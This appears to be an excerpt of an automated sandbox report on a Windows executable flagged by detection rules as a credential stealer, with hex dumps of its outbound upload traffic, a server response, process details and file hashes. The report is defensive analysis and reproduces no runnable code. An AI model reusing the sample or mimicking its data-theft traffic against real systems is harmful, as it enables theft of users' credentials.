                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 91 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c 77 77 3d 90 a1 06
                                                                                                              Data Ascii: qen;|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\ww=
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 74 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32 88 1c ee b7 a9 d9
                                                                                                              Data Ascii: tzxvDg)rfH\W-*^5vE*!/W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 06 bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1 be 6e 39 e4 aa 00
                                                                                                              Data Ascii: = qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xyn9
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 34 d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60
                                                                                                              Data Ascii: 4,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: 0b f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf
                                                                                                              Data Ascii: i?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: e6 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2
                                                                                                              Data Ascii: ak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:iv
                                                                                                              2024-12-23 07:35:22 UTC15331OUTData Raw: e4 c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a
                                                                                                              Data Ascii: \w"ms.[m=TFpZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*
                                                                                                              2024-12-23 07:35:26 UTC1129INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:26 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=bs6vvkg98rojafu86n0dph06vp; expires=Fri, 18 Apr 2025 01:22:03 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gp5tdpKbRV6TanEPIb6vZmUbdFjnYL2TOMHOetyrDI%2BenvK6mQecG9NrzJnLsJc51JgrloqJuAwWI5t7SAhKwrZmtNPP26ylSu5G1XbUOrdNkMs8%2FiRm1Ncpg3vLrUlpVjA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66acb04b0fc43b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1527&rtt_var=584&sent=343&recv=594&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573312&delivery_rate=1912246&cwnd=194&unsent_bytes=0&cid=bea837eb036e9826&ts=3754&x=0"


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Target ID:0
                                                                                                              Start time:02:35:04
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\FjFeChttqA.exe"
                                                                                                              Imagebase:0xfa0000
                                                                                                              File size:2'953'728 bytes
                                                                                                              MD5 hash:E21681EF00EBFAEE22CD2137A1349DE0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Reset < >
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, Offset: 018B8000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_18b8000_FjFeChttqA.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: n
                                                                                                                • API String ID: 0-2013832146
                                                                                                                • Opcode ID: 5ef7f82e42e7ef0a230e79c6371041d7da2ec8e211e0495c59d0d439b05ef74e
                                                                                                                • Instruction ID: 8694aff5cd781e6b8dbffc125c5855ba8661385cccbf37094aa5182087089452
                                                                                                                • Opcode Fuzzy Hash: 5ef7f82e42e7ef0a230e79c6371041d7da2ec8e211e0495c59d0d439b05ef74e
                                                                                                                • Instruction Fuzzy Hash: 0502545104E7C15FC7238B304DBA6A2BFB16E5321471E86CFD5C18F4B3D24A9A4AE362